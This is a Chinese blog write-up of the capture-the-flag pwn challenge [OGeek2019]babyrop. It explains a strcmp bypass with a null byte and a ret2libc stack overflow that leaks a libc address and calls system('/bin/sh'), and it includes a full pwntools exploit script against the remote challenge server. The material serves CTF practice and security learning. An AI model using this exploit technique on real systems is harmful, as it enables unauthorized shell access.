writeUP-[OGeek2019]babyrop 1

已于 2022-11-04 12:11:14 修改
阅读量718 收藏
点赞数
文章标签: 网络 运维 算法
于 2022-08-12 14:56:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52111404/article/details/126304361
版权

声明:本文用途为供自己学习

目录

一、思路

本题之前做过类似题型,在此主要记录使用LibcSearcher时遇到的问题。
在这里插入图片描述
在这里插入图片描述


程序会从一个文件中取出一个随机字符串,并从输入中读字符串,将两个字符串用进行比较strcmp进行比较,如果字符串相同,则程序不退出,输出Correct并将输入字符串的第8个数字作为返回值,作为下一个函数的参数,决定第二次输入字符串的最大长度。而buf到ebp的偏移量为0xE7(231),考虑到char的长度为1byte=8bit,可以表示的十进制的最大值为255,可以有20个byte用来构造ROP链。由于程序中没有system函数,利用ret2libc的方法。

二、攻击过程

(一)审计代码、绕过strcmp函数

在这里插入图片描述

buf = b'\0' + b'a' * (0x7 - 1) + p32(255)
# payload1=b'\x00' + b‘\xff' * 7 #(转义字符)

s的值a1,为main函数中输入的随机数,v1的值为srrlen(buf),当buf第一位为\0时,v5=0,strcmp因为比较长度为0,所以在判断长度内,没有不相等的字符串,于是函数返回值为输入字符串的第八个字节。在下一个函数里,该数字决定了可输入字符串的最大长度,于是将其设置为255。(P32(255)的意义等同于 ff 00 00 00(小端序), 和\xff是一个意思)

(二)泄露libc的相关地址信息

elf = ELF('./pwn')
write_plt = elf.plt['write']
write_got = elf.got['write'] ## 可以是read,下面相应推测函数真实地址的位置要改成read
main_addr = 0x8048825 # elf.symbols['main'] (32位程序不可通过symbols来找main)

payload = b'a' * (0xe7 + 4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4) 
io.sendline(payload)

write_addr = u32(io.recv(4))
print(hex(write_addr))

关于传递main函数地址的位置:由于write_plt作为为retuen address,那么write_plt后应该紧接着传递一个ebp地址作为write函数结尾时的ret的返回地址,write有三个参数,第一个为1,第二个为write_got表的地址(该地址不是write的真实地址,其内容才是)。第三个为读取长度,由于32为程序的地址长度为4byte,该参数穿4即可。
在接收返回地址时一定要确保’CORRECT\n‘已经被接收。

(三)利用LibcSearcher计算system(“/bin/sh”)的相关地址

libc = LibcSearcher('write',write_addr) ## 可以是read
libc_base = write_addr - libc.dump('write') ## 可以是read
sys_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')


# libc = ELF("./libc-2.23.so")
# libc_base = write_addr - libc.symbols['write']
# sys_addr = libc_base + libc.symbols['system']
# binsh_addr = libc_base + libc.search(b'/bin/sh').__next__()

首先要确保自己的libcSearcher没有问题,有问题则不能攻击成功,比如我的wsl、kali、Ubuntu20中不能正常攻击(也可能单纯是LibcSeacher的问题),ubuntu18的虚拟机里就可以。
利用现成的libc库并不能攻击成功,不清楚原因,有待后续探究

三、攻击脚本

from pwn import * 
from LibcSearcher import *
context(os = 'linux', arch = 'amd64', log_level = 'debug')
ifRemote = 1
if ifRemote:
	io = remote("node4.buuoj.cn",26390)
else:
	io = process("./pwn1")

buf = b'\0' + b'a' * (0x7 - 1) + p32(255)
io.sendline(buf)
#io.recvuntil('Correct\n')
io.recvline()
# io.recv()
elf = ELF('./pwn')
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = 0x8048825 # elf.symbols['main']

payload = b'a' * (0xe7 + 4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4) 
io.sendline(payload)

write_addr = u32(io.recv(4))
print(hex(write_addr))


libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
sys_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')


# libc = ELF("./libc-2.23.so")
# libc_base = write_addr - libc.symbols['read']
# sys_addr = libc_base + libc.symbols['system']
# binsh_addr = libc_base + libc.search(b'/bin/sh').__next__()

io.sendline(buf)
# io.recvuntil('Correct\n')
io.recvline()

payload2 = b'a' * (0xe7 + 4) + p32(sys_addr) + p32(1) + p32(binsh_addr)
io.sendline(payload2)
io.interactive()

四、遇到的问题

(一)LibcSearcher的库不全,不能够正常找到对应的库

在这里插入图片描述

(二)ROP链的构造

在return address后加入什么样的gadget不理解:在return address后,由于每个函数最后都有ret指令,所以要加ebp,可以是垃圾字节(奇怪,那puts函数呢?不过那个是64位的,可能有特殊)

irontys
关注
buuctf刷题——[OGeek2019]babyrop 1
qq_41560595的博客
03-14 3659
好久好久没做ctf题了,今天得空刷刷buuctf,emm,发现好多都忘了。???????????? 查看权限 不能利用shellcode,但可以构造栈溢出。 查看源程序 为了方便区分,重命名了下函数。 open函数的返回值:如果操作成功,它将返回一个文件描述符,如果操作失败,它将返回-1; 文件描述符:0,1,2是标准IO输入/输出/错误输出给占用了,当文件open成功了,会返回数值3; read(fd,&buf,4u)是把fd所指向的随机数写入到buf文件中,长度是4个字节。 此时,buf是
[OGeek2019]babyrop
迷风小白
02-09 1210
[OGeek2019]babyrop 查看程序的保护机制 发现是got表不可写的32位程序 拖进ida查看伪代码 sub_80486BB是初始化缓存区的函数 发现buf是一个随机数 发现函数中存在strncmp比较函数,其中buf为用户输入的值,&s为buf随机数,如果不相等则会退出程序,所以需要想办法绕过这个判断,所以v1的值必须为0 v1 = strlen(buf),strlen这个函数有个缺陷:遇到\x00直接截断。所以我们要输入第一位数为\x00 buf是一个7位数的数组,但函数中
BUUCTF|PWN-[OGeek2019]babyrop1-WP
l2645470582_的博客
01-12 2280
1.检查保护机制 (1)该文件是32位文件 (2)开启堆栈不可执行 2.用32位IDA打开该文件
关于buuctf[OGeek2019]babyrop 1的一些些小结
Probeginner的博客
11-25 688
首先对于题目分析: 正常的32位小端序,checksec一下发现开了NX…………算了直接进正题。1.open函数的返回值,如果执行成功,他将返回一个文件描述,如果失败,他将返回-1.这里显然是成功了 2.文件描述符:0,1,2:是标准I/O输入、输出、错误。这里open执行成功了会返回3。 3.此时read(fd,&buf,4u)的意思是把fd指向的那个随机数输入buf中。 这里需要注意的是:strcmp函数可用“\x00”来截断,进而覆盖下面的v5变量,随后让 第二个read函数读入的“a1”
BUUCTF [OGeek2019]babyrop
红叶的博客
10-30 683
不知道为什么远程进不去,后来选择了不用LibcSearcher,用题目提供的Libc进去了。分析完反汇编成C语言的程序源码后,就是常规的ret2libc了。由于本题是32位ELF,因此不需要rdi与ret栈对齐。思路有了,接下来是构造PoC与Payload。strlen 遇到 \x00会截断。使用puts函数进行泄露真实地址。成功本地获取shell。首先绕过 strlen。
2021强网杯Writeup--by Nu1L Team.pdf
06-15
标题和描述所涉及的知识点有:“2021强网杯Writeup--by Nu1L Team.pdf”,“第五届‘强网杯’全国网络安全挑战赛”以及标签“CTF 网络安全 信息安全”。这些信息共同指向一个全国性的网络安全竞赛和Nu1L团队提交的...
ustclug#hackergame2019-writeups#writeup-十次方根1
07-25
十次方根题解step 2: Use Hensel’s lifting to find roots over y3。
网鼎杯writeup-护网先锋1
08-04
【网鼎杯writeup-护网先锋1】的知识点总结: 在网络安全竞赛“网鼎杯”中,参赛者需要解决一系列挑战,这些挑战涉及到多种安全技术,如代码泄露、漏洞利用、加壳破解、文件格式分析等。以下是各部分的具体知识点: ...
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一篇关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透1
08-03
《空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透》这篇文章讲述了在Windows环境下针对Discuz! 3.4版本进行渗透测试的过程。本文将深入解析其中涉及的关键知识点,包括authkey的作用、Windows短文件名的安全...
软件如何画pcb螺丝孔_如何画函数图像(常见函数篇)——动态数学软件GeoGebra...
weixin_33397994的博客
01-13 482
在GeoGebra里,一输入表达式,函数图像瞬间出来。下面,我们来看看常见函数是如何输入的。分类普通函数例:f(x) = sin(2x),g(x) = x² + 2【直接输入“=”右边的式子即可】分别输入sin(2x) , x^2 + 2系数待定的函数【法一】输入表达式,再点“创建滑动条”例:f(x) = k x + b输入k x + b,再“创建滑动条”【法二】先创建滑动条,再输入表达式例:f(...
OGeek2019bayrop
m0_62322730的博客
05-06 408
OGeek2019bayrop
buuctf-[OGeek2019]babyrop
weixin_44864859的博客
04-09 2255
查看主函数 int __cdecl main() { int buf; // [esp+4h] [ebp-14h] char v2; // [esp+Bh] [ebp-Dh] int fd; // [esp+Ch] [ebp-Ch] sub_80486BB(); fd = open("/dev/urandom", 0); if ( fd > 0 ) read...
babyrop
qq_46441427的博客
07-09 227
文章目录一、题目特征二、使用步骤1.引入库2.读入数据总结 一、题目特征 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._create_default_https_context = ssl.
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 543
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1341
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值